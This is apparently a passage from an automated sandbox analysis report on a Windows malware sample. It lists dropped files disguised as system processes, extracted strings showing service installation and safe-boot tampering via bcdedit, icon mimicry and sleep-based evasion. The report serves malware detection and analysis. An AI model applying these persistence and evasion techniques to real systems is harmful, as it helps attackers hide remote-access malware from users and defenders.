                          Source: C:\Windows\SysWOW64\cmd.exeExecutable created and started: C:\Windows\Tasks\sync_browser.exeJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Nfe70s.UFVVkMJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\WPSela.LSZr7VJump to dropped file
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7VJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\Nfe70s.UFVVkMJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\sync_browser.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\conhost.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\WPSela.LSZr7VJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\Nfe70s.UFVVkMJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\sync_browser.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\conhost.exeJump to dropped file
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Nfe70s.UFVVkMJump to dropped file
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\id2rlx.MxYNRdJump to dropped file
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7VJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\id2rlx.MxYNRdJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\Nfe70s.UFVVkMJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\WPSela.LSZr7VJump to dropped file
                          Source: sync_browser.exe.6.drBinary or memory string: bcdedit.exe
                          Source: sync_browser.exe.6.drBinary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
                          Source: WPSela.LSZr7V.2.drBinary or memory string: bcdedit.exe
                          Source: WPSela.LSZr7V.2.drBinary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
                          Source: WPSela.LSZr7V.0.drBinary or memory string: bcdedit.exe
                          Source: WPSela.LSZr7V.0.drBinary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC117D50 GetPrivateProfileIntA,18_2_00007FF6DC117D50
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC117E10 GetPrivateProfileIntA,18_2_00007FF6DC117E10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC117650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,18_2_00007FF6DC117650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC117EB0 GetPrivateProfileIntA,18_2_00007FF6DC117EB0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC117750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,18_2_00007FF6DC117750
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC117F50 GetPrivateProfileIntA,18_2_00007FF6DC117F50
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC1177F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,18_2_00007FF6DC1177F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC1178E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,18_2_00007FF6DC1178E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C81AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin18_2_00007FF6DC0C81AD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0CE1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat18_2_00007FF6DC0CE1D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC119A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,18_2_00007FF6DC119A40
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC117BD0 GetPrivateProfileIntA,18_2_00007FF6DC117BD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC117C90 GetPrivateProfileIntA,18_2_00007FF6DC117C90
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC117D50 GetPrivateProfileIntA,23_2_00007FF6DC117D50
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC117E10 GetPrivateProfileIntA,23_2_00007FF6DC117E10
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC117650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,23_2_00007FF6DC117650
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC117EB0 GetPrivateProfileIntA,23_2_00007FF6DC117EB0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC117750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,23_2_00007FF6DC117750
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC117F50 GetPrivateProfileIntA,23_2_00007FF6DC117F50
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC1177F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,23_2_00007FF6DC1177F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC1178E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,23_2_00007FF6DC1178E0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0C81AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin23_2_00007FF6DC0C81AD
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0CE1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat23_2_00007FF6DC0CE1D0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC119A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,23_2_00007FF6DC119A40
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC117BD0 GetPrivateProfileIntA,23_2_00007FF6DC117BD0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC117C90 GetPrivateProfileIntA,23_2_00007FF6DC117C90
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\0271695705143540Jump to behavior

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Icon mismatch, binary includes an icon from a different legit application in order to fool users
                          Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (98).png
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0F48B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,18_2_00007FF6DC0F48B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0F48B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,23_2_00007FF6DC0F48B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0F3E20 OpenInputDesktop,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,SetThreadDesktop,LoadLibraryA,GetProcAddress,GetStockObject,RegisterClassExA,SetEvent,CreateWindowExA,SetTimer,SetWindowLongPtrA,SetClipboardViewer,CreateThread,CloseHandle,GetModuleFileNameA,GetModuleFileNameA,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetEvent,PeekMessageA,Sleep,CreateRectRgn,CombineRgn,DeleteObject,free,SetEvent,SetEvent,SetEvent,TranslateMessage,DispatchMessageA,WaitMessage,DestroyWindow,DestroyWindow,SetEvent,KillTimer,FreeLibrary,FreeLibrary,FreeLibrary,SetThreadDesktop,CloseDesktop,18_2_00007FF6DC0F3E20
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Tasks\sync_browser.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC129BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,18_2_00007FF6DC129BC0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,18_2_00007FF6DC0C9D00
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,23_2_00007FF6DC0C9D00
                          Source: C:\Windows\Tasks\sync_browser.exeWindow / User API: threadDelayed 1108
                          Source: C:\Windows\SysWOW64\timeout.exeWindow / User API: threadDelayed 360
                          Source: C:\Windows\Tasks\sync_browser.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_18-23060
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Nfe70s.UFVVkMJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Windows\Tasks\Nfe70s.UFVVkMJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Windows\Tasks\conhost.exeJump to dropped file
                          Source: C:\Windows\Tasks\sync_browser.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_18-23826
                          Source: C:\Windows\Tasks\sync_browser.exeAPI coverage: 3.3 %
                          Source: C:\Windows\Tasks\sync_browser.exeAPI coverage: 1.1 %
                          Source: C:\Windows\Tasks\sync_browser.exe TID: 5432Thread sleep time: -110800s >= -30000s
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 7776Thread sleep count: 61 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 1400Thread sleep count: 360 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 1400Thread sleep time: -36000s >= -30000s
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
